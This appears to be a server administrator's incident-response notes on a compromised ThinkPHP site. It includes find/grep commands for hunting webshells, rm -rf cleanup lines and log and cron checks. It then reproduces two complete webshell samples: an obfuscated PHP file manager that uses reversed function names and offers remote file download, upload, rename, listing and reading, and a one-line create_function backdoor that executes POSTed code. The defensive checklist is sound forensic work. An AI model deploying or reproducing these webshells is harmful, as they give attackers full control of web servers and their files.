==========================================================================================================================================
find /home/www/web_weiya/thinkphp5.1/weiya/public/ -name '*.php'
rm -rf /home/www/web_weiya/thinkphp5.1/weiya/public/*.php
find /home/www/web_weiya/thinkphp5.1/weiya/runtime/ -name '*.php'
rm -rf /home/www/web_weiya/thinkphp5.1/weiya/runtime/*.php
==========================================================================================================================================
通过grep去查找webshell:
find  /home/www/web_weiya/  -type f -name "*.php"  |xargs grep "eval"
查看是否使用加密函数：
find  /home/www/web_weiya/  -type f -name "*.php"  |xargs grep "base64_decode"
查看是否做了拼接处理：
find  /home/www/web_weiya/  -type f -name "*.php"  |xargs grep "@$"
查找24小时内被修改的PHP文件： 
find /home/www/web_weiya/ -mtime 0 -name "*.php" 
进程分析,使用netstat 网络连接命令，分析可疑端口、可疑IP、可疑PID及程序进程
（top可以实时动态的查看系统的整体运行情况，主要分析cpu和内存多的进程，是一个不错的综合了多方面信息监测系统性能和运行信息的实用工具），
最好可以去区分对外的监听端口和对内的监听端口，一般可以有效的查找出后门。
netstat -antpl | more
系统信息分析
history (cat /root/.bash_history)
//查看分析history (cat /root/.bash_history)，曾经的命令操作痕迹，以便进一步排查溯源
/etc/passwd
//查看有无新增的恶意用户或者除root之外uid为0的用户
crontab  /etc/cron*
//查看当前的任务计划有哪些，是否有后门木马程序启动相关信息
==========================================================================================================================================
<?php 
	error_reporting(0);
	$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";
	$id=$sr/*+/*+*/("ri"."d_"."si");
	$rn=$sr/*+/*+*/("em"."an"."er");
	$dn=$sr/*+/*+*/("em"."anr"."id");
	$od=$sr/*+/*+*/("ri"."dne"."po");
	$rd=$sr/*+/*+*/("ri"."dda"."er");
	$cd=$sr/*+/*+*/("ri"."deso"."lc");
	$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");
	$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");
	$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");
	$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';
	$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';
	$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';
	$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';
	$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';
	if($_GET['act']=='dl'){
		echo($dlform);
		if($_SERVER['REQUEST_METHOD']=='POST'){
			$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));
		}
		exit;
	}
	if($_GET['act']=='ul'){
		echo($ulform);
		if($_SERVER['REQUEST_METHOD']=='POST'){
			$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';
			$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);
		}
		exit;
	}
	if($_GET['act']=='rn'){
		echo($rnform);
		if($_SERVER['REQUEST_METHOD']=='POST'){
			$rn/*+/*+*/($_POST['on'],$_POST['nn']);
		}
		exit;
	}
	if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));
		exit;
	}
	if($_GET['act']=='lp'){
		echo($lpform);
		if($_SERVER['REQUEST_METHOD']=='POST'){
			$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);
			while(($fn=$rd/*+/*+*/($h))!==false){
				if($id/*+/*+*/($dp.$fn)){
					$t1.='D&nbsp;'.$fn.'<br>';
				}else{
					$t2.='&nbsp;&nbsp;'.$fn.'<br>';
				}
			}
			$cd/*+/*+*/($dp);
			echo($dp.'<br>'.$t1.$t2);
		}
		exit;
	}
	if($_GET['act']=='sf'){
		echo($sfform);
		if($_SERVER['REQUEST_METHOD']=='POST'){
			$df=$_POST['df'];
			echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');
		}
		exit;
	}
?>
------------------------------------------------------------------------------------------------------------------------------------------
<?php
$st = @create_function('', $_POST['datas']);
$st();
==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================

==========================================================================================================================================